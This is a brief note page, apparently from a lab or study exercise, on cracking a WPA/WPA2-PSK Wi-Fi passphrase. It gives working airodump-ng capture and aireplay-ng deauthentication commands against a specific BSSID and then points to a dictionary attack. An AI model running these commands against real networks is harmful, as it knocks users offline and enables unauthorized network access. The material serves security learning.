Cracking WPA/WPA2-PSK
Objective: Crack the WPA handshake for the network and get the network pre-shared passphrase!
Set interface into monitor mode
check for networks with airodump-ng

Start the capture, but need the handshake
airodump-ng wlan0 -c 6 -w test
use aireplay to deauth the clients connecting to thee BSSID to capture the handshake
aireplay-ng -0 100 -a A2:E9:68:D3:03:10 wlan0
Now have the handshake, can perform a dictionary attack


Last updated